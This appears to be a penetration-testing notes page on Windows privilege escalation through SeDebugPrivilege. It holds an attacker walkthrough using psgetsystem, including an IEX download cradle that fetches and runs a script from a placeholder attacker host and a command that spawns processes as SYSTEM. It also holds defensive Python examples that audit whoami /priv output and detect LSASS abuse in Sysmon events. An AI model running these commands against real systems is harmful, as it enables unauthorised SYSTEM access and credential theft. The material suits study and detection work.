PRIMARY CATEGORY → WINDOWS PRIVESC

Enumeration

whoami /priv

LSASS Dump

If we compromise a domain or local user account that has SeDebugPrivilege enabled, we may be able to generate a memory dump of certain protected and sensitive processes, such as LSASS

See LSASS Memory Dump
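Added example (not from the original page or from any tool the page references): a small Python parser for the table printed by whoami /priv, used from an audit stance to flag high-risk privileges held by a token. The sample output and the shortlist of privileges treated as high-risk are constructed assumptions of the example. The practical caveat it encodes: a privilege shown as Disabled is still held by the token and can be enabled by the process itself, so an audit has to key on presence, not on the Enabled/Disabled state.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of `whoami /priv` output for the example; not captured from a real host.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
"""

# Privileges that typically let a holder reach SYSTEM-level access. This set is an
# assumption of the example (a reviewer's shortlist), not an official classification.
HIGH_RISK_PRIVILEGES = {
    "SeDebugPrivilege": "open any non-protected process and read/write its memory (e.g. LSASS)",
    "SeImpersonatePrivilege": "impersonate the token of a connecting client",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# One privilege row: name, free-text description, then Enabled/Disabled.
PRIV_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")


@dataclass(frozen=True)
class Privilege:
    name: str
    description: str
    enabled: bool


def parse_whoami_priv(text: str) -> List[Privilege]:
    """Parse the table printed by `whoami /priv` into Privilege records."""
    rows = []
    for line in text.splitlines():
        m = PRIV_ROW.match(line.strip())
        if m:
            rows.append(Privilege(m.group(1), m.group(2).strip(), m.group(3) == "Enabled"))
    return rows


def high_risk_privileges(privs: List[Privilege]) -> List[Privilege]:
    """Return every high-risk privilege *held* by the token, enabled or not.
    A Disabled privilege is still present in the token and can be enabled by the
    process itself, so the audit keys on presence rather than on state."""
    return [p for p in privs if p.name in HIGH_RISK_PRIVILEGES]


def report(text: str) -> List[str]:
    """Human-readable findings, one line per high-risk privilege held."""
    lines = []
    for p in high_risk_privileges(parse_whoami_priv(text)):
        state = "enabled" if p.enabled else "present but disabled"
        lines.append(f"{p.name} ({state}): {HIGH_RISK_PRIVILEGES[p.name]}")
    return lines


if __name__ == "__main__":
    for finding in report(SAMPLE_WHOAMI_PRIV):
        print(finding)
```

Run it against the saved output of whoami /priv from the account under review; on the constructed sample it reports SeDebugPrivilege as enabled and SeImpersonatePrivilege as present but disabled, which is the finding an auditor wants to see regardless of the State column.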


RCE as LOCAL SYSTEM

PSGetSystem

Setup
  • From the Attacker ⚔️
curl --silent --location --request GET "https://github.com/decoder-it/psgetsystem/raw/refs/heads/master/psgetsys.ps1" --remote-name
python3 -m http.server 80
  • From the Target 🎯
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER>/psgetsys.ps1')
Process PID as Local System

Once we have imported the PowerShell functions into our current session, we have to locate a process running as LOCAL SYSTEM

A non-privileged user account usually does not have enough privileges to list the owner of every running process

However, there are several well-known processes in a Windows system that always run as Local System, such as the LSASS process (lsass.exe)

Therefore, we can list the details of one of them to obtain its PID

( Get-Process | ? { $_.ProcessName -eq '<PROCESS_NAME>' } ).Id
Command Execution

With the required PID, we can run the command below to spawn a new child process of that process, which will be executed as LOCAL SYSTEM

Remember that SeDebugPrivilege allows an arbitrary process, such as cmd.exe, to debug any non-protected process, which includes reading from and writing to the memory space of the latter

And that’s actually what we are doing here

ImpersonateFromParentPid -ppid <PARENT_PID> -command "<COMMAND>" -cmdargs "<COMMAND_ARGS>"
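Added example from the defender's side (not from the original page or from the psgetsystem project): detection logic in Python, run over constructed Sysmon-style events, for the two observable steps of the procedure above. Step one is a handle opened on lsass.exe with PROCESS_CREATE_PROCESS or PROCESS_VM_READ rights (Sysmon event 10, ProcessAccess); step two is a process whose recorded parent is lsass.exe (Sysmon event 1, ProcessCreate), which never has legitimate children. Because the parent is chosen by the caller, the logged parent is exactly the SYSTEM process that was targeted, so the anomaly is the parent/child pair itself. The sample events, the source-process allowlist and the parent sets are assumptions for the example and must be tuned per environment.

```python
from typing import Callable, List, Optional, Tuple

# Windows process access rights relevant here (values as documented in winnt.h).
PROCESS_VM_READ = 0x0010          # read another process's memory (credential dumping)
PROCESS_CREATE_PROCESS = 0x0080   # required to name the process as parent in CreateProcess

# Sysmon event IDs used below.
PROCESS_CREATE = 1
PROCESS_ACCESS = 10

# Constructed sample events in the shape a SIEM would index from Sysmon; not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "SourceUser": "CORP\\jdoe"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "SourceUser": "NT AUTHORITY\\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\lsass.exe", "User": "NT AUTHORITY\\SYSTEM",
     "ParentProcessId": 688, "ProcessId": 5120},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe",
     "ParentProcessId": 4012, "ProcessId": 5388},
]

# Assumptions of this example; tune all three sets to the environment.
ACCESS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wmiprvse.exe"}   # known-good lsass readers
NO_CHILD_PARENTS = {"lsass.exe"}                                   # never spawns anything
SYSTEM_PARENTS_NO_SHELL = {"winlogon.exe", "wininit.exe", "smss.exe", "csrss.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def image_name(path: str) -> str:
    """Lowercase file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lsass_access(ev: dict) -> Optional[str]:
    """Event 10: a handle on lsass.exe with memory-read or create-process rights
    from a source that is not on the allowlist."""
    if ev.get("EventID") != PROCESS_ACCESS:
        return None
    if image_name(ev["TargetImage"]) != "lsass.exe":
        return None
    mask = int(ev["GrantedAccess"], 16)
    if not mask & (PROCESS_VM_READ | PROCESS_CREATE_PROCESS):
        return None
    if image_name(ev["SourceImage"]) in ACCESS_ALLOWLIST:
        return None
    return "lsass_handle_access"


def detect_system_parent_child(ev: dict) -> Optional[str]:
    """Event 1: a child recorded under a SYSTEM process that should not have one."""
    if ev.get("EventID") != PROCESS_CREATE:
        return None
    parent = image_name(ev["ParentImage"])
    child = image_name(ev["Image"])
    if parent in NO_CHILD_PARENTS:
        return "lsass_spawned_child"
    if parent in SYSTEM_PARENTS_NO_SHELL and child in SHELLS:
        return "system_process_spawned_shell"
    return None


RULES: Tuple[Callable[[dict], Optional[str]], ...] = (detect_lsass_access, detect_system_parent_child)


def run_detections(events: List[dict]) -> List[Tuple[str, int]]:
    """Apply every rule to every event; return (rule_name, event_index) hits in order."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((name, idx))
    return hits


if __name__ == "__main__":
    for name, idx in run_detections(SAMPLE_EVENTS):
        print(f"[{name}] event {idx}: {SAMPLE_EVENTS[idx]}")
```

On the sample, the PowerShell handle with full access on lsass.exe and the cmd.exe recorded under lsass.exe are flagged, while the allowlisted antivirus read and the explorer.exe child are not. The two rules are deliberately kept independent: the access rule fires even when the parent is later spoofed to a process other than lsass.exe, and the parent/child rule fires even when the handle was opened by a process the access rule allowlists.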
Examples

References

Decoder: Getting System